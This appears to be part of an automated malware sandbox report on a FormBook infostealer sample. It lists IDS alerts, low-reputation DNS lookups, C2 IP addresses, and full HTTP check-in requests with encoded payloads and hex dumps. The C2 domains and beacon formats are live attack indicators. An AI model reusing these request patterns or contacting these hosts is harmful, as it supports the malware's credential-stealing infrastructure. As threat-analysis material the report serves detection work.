Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 194.245.148.189:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49935 -> 103.230.159.86:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49935 -> 103.230.159.86:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 194.245.148.189:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.beylikduzu616161.xyz

Source: Joe Sandbox View	IP Address: 194.195.220.41 194.195.220.41
Source: Joe Sandbox View	IP Address: 209.74.77.109 209.74.77.109

Source: Joe Sandbox View	ASN Name: NEXINTO-DE NEXINTO-DE
Source: Joe Sandbox View	ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View	ASN Name: MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01034EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_01034EB5

Source: global traffic	HTTP traffic detected: GET /vluw/?tz=vf30S8fHB&QtKtUpvP=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8y2McqSV4CyXoecV2gg9VjbRvcHdH27Oe7WVepG5jlbykA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.zkdamdjj.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /a4h7/?QtKtUpvP=PP6GFaOQILwxi5dhMSrYmidfGUiluWiM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQIlAkX0zk7pOsjI4l/Wq/rNtJEsfTGHPBsIUykA9D3Lpwbw==&tz=vf30S8fHB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.75178.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /k6yn/?QtKtUpvP=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6Q7f6sEw+fEYYIvxzrJruwJPw/20oMsQ+GrA/2J3jy9WwQ==&tz=vf30S8fHB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.orbitoasis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /cboa/?QtKtUpvP=af1TSyH9ZKWDWOLime6W6+N8m41wPvg6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdbhiTzjWIK5GaGrrUVA8lRVN39YIo9Jhl2SEWFfoBlbvNzQ==&tz=vf30S8fHB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.thaor56.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /0gis/?QtKtUpvP=aMrcg/vn2G/nVrnfdsqttTKn7l5IpN7CuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbZWinawpycNRn/wEPfqmvFpRpTTVHR2CtA1GmAj29Nvoqiw==&tz=vf30S8fHB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.earbudsstore.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /bwyw/?QtKtUpvP=zeqgG3zf3rSD22A3/l1gTLGQ/sW8joOuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wfdJrEMWBKO10oQJYs1X8DEHawfodtM5bXZSXpbQgLy9TLag==&tz=vf30S8fHB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.superiorfencing.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /2nga/?tz=vf30S8fHB&QtKtUpvP=Q2EbwnYhq4vEVEYycJMqtdR4BlKtLPQlBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63UJrMUJCnw12qESZ+LX2nRCILA4nY1/3XgMLmpfKZAfJSNaA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beylikduzu616161.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /gxyh/?QtKtUpvP=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT++SddUagkPsJGob5DgpUWzHX7f3q0+yGEQcdTuVkFKJ4g4Q==&tz=vf30S8fHB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.zxyck.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /n9b0/?tz=vf30S8fHB&QtKtUpvP=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd4uwKXUWjpBKipcp7aPXApUFDa1q1IM66i0qgt5iDmW/Xqw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dailyfuns.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Source: global traffic	HTTP traffic detected: GET /1ag2/?QtKtUpvP=4VB/N4F6tibqC9FTErplINOthlfgxvKF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxY86kHntrUB3V3amez42c7fYExSv8wX62GyA3d/Me6afi2Q==&tz=vf30S8fHB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mydreamdeal.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko

Source: global traffic	DNS traffic detected: DNS query: www.zkdamdjj.shop
Source: global traffic	DNS traffic detected: DNS query: www.75178.club
Source: global traffic	DNS traffic detected: DNS query: www.orbitoasis.online
Source: global traffic	DNS traffic detected: DNS query: www.thaor56.online
Source: global traffic	DNS traffic detected: DNS query: www.earbudsstore.shop
Source: global traffic	DNS traffic detected: DNS query: www.superiorfencing.net
Source: global traffic	DNS traffic detected: DNS query: www.beylikduzu616161.xyz
Source: global traffic	DNS traffic detected: DNS query: www.zxyck.net
Source: global traffic	DNS traffic detected: DNS query: www.dailyfuns.info
Source: global traffic	DNS traffic detected: DNS query: www.mydreamdeal.click
Source: global traffic	DNS traffic detected: DNS query: www.maitreyatoys.world

Source: unknown

HTTP traffic detected: POST /a4h7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.75178.clubOrigin: http://www.75178.clubCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeReferer: http://www.75178.club/a4h7/User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like GeckoData Raw: 51 74 4b 74 55 70 76 50 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 32 37 4e 53 4e 44 43 47 76 45 42 41 54 33 6d 56 72 6d 72 37 70 69 62 7a 53 2b 50 31 45 69 35 57 37 31 45 54 41 36 77 4c 6e 57 53 51 39 35 70 4a 57 54 4e 78 65 63 6c 30 46 34 2b 33 6e 2b 4b 34 41 4e 6a 64 50 38 6e 63 4c 48 42 61 56 53 6a 56 32 34 37 6f 72 36 67 6b 32 31 65 69 6c 65 56 50 4c 76 6a 45 4a 51 37 57 67 34 74 7a 37 52 42 48 74 76 34 53 49 34 4c 4a 4a 39 32 53 30 68 34 78 57 70 6e 30 65 4b 66 4d 34 64 6b 47 4d 4b 67 2f 75 6b 59 48 61 32 71 37 41 79 31 6e 4c 4e 36 30 36 52 67 55 42 57 46 4b 70 4e 73 6c 55 41 4d 77 75 4d 6f 76 62 54 70 7a 71 50 30 3d Data Ascii: QtKtUpvP=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHa2q7Ay1nLN606RgUBWFKpNslUAMwuMovbTpzqP0=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 29 Nov 2024 02:53:30 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 29 Nov 2024 02:53:32 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 29 Nov 2024 02:53:35 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Fri, 29 Nov 2024 02:53:38 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 33 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 